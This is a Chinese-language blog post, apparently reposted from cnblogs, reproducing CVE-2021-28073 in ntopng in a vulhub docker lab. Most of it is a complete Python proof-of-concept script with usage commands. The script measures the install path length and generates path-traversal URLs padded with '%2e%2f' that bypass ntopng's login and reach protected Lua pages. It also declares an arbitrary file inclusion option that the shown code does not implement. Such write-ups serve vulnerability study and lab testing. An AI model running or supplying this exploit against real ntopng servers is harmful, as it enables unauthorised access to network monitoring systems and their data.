标签:lua ntopng get url length base 2021 path CVE
0x01影响范围
ntopng commit < e8b9721479f401f595c5c7bb151819aceb03ad71
0x02 环境搭建
https://github.com/vulhub/vulhub/tree/master/ntopng/CVE-2021-28073
docker-compose up -d
yourip:3000 进入环境,admin:admin登录
0x03 漏洞复现
POC:
import sys
import requests
import argparse
import logging
def is_ntopng() -> bool:
response = session.get(base_url, allow_redirects=False)
return response.status_code == 302 and '/lua/login.lua' in response.headers.get('Location', '')
def get_base_length() -> int:
for i in range(90, 120):
url = base_url + '/lua/' + '%2e%2f' * i + 'as_stats.lua.css'
response = session.get(url, allow_redirects=False)
if response.status_code < 300:
return 255 - 1 - i * 2 - len('as_stats.lua')
for i in range(90, 120):
url = base_url + '/lua/' + '%2e%2f' * i + 'get_macs_data.lua.css'
response = session.get(url, allow_redirects=False)
if response.status_code < 300:
return 255 - 1 - i * 2 - len('get_macs_data.lua')
return -1
def get_padding_length(path: str):
padding_length = 255 - 1 - base_length - len(path)
if padding_length % 2 == 1:
raise RuntimeError(f'path {path} is not support')
return int(padding_length / 2)
logging.basicConfig(stream=sys.stderr, level=logging.WARNING)
session = requests.Session()
session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='CVE-2021-28073 POC for ntopng.')
parser.add_argument('-u', '--url', help='base url for ntopng, eg: http://192.168.1.233:3000', metavar='<URL>', required=True)
parser.add_argument('-v', '--verbose', default=False, action='store_true')
subparsers = parser.add_subparsers(dest='action')
baselength_command = subparsers.add_parser('baselength', help='get base path length of ntopng')
generate_command = subparsers.add_parser('generate', help='generate the authenticate bypass url')
generate_command.add_argument('-l', '--length', type=int, help='base path length of target ntopng', metavar='<LENGTH>', required=True)
generate_command.add_argument('-p', '--path', help='lua pathname', metavar='<PATH>', required=True)
generate_command = subparsers.add_parser('include', help='generate the arbitrary file inclusion url')
generate_command.add_argument('-l', '--length', type=int, help='base path length of target ntopng', metavar='<LENGTH>', required=True)
generate_command.add_argument('-i', '--include', help='path to include', metavar='<PATH>', required=True)
args = parser.parse_args()
if not args.action:
parser.print_help()
sys.exit(1)
if args.verbose:
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
base_url = args.url.rstrip('/')
# check target
if not is_ntopng():
raise RuntimeError('No Ntopng detected')
if args.action == 'baselength':
base_length = get_base_length()
sys.stdout.write(f'ntopng install path length: {base_length}\n')
elif args.action == 'generate':
base_length = args.length
path = args.path
sys.stdout.write(base_url + '/lua/' + '%2e%2f' * get_padding_length(path) + path + '.css\n')
读lua长度并生成越权访问URL
python3 poc.py --url ip:port baselength
python3 poc.py --url ip:port generate -l 36 -p find_prefs.lua
访问得到的url,越权访问正常信息
标签:lua,ntopng,get,url,length,base,2021,path,CVE 来源: https://www.cnblogs.com/Stunmaker/p/14640503.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。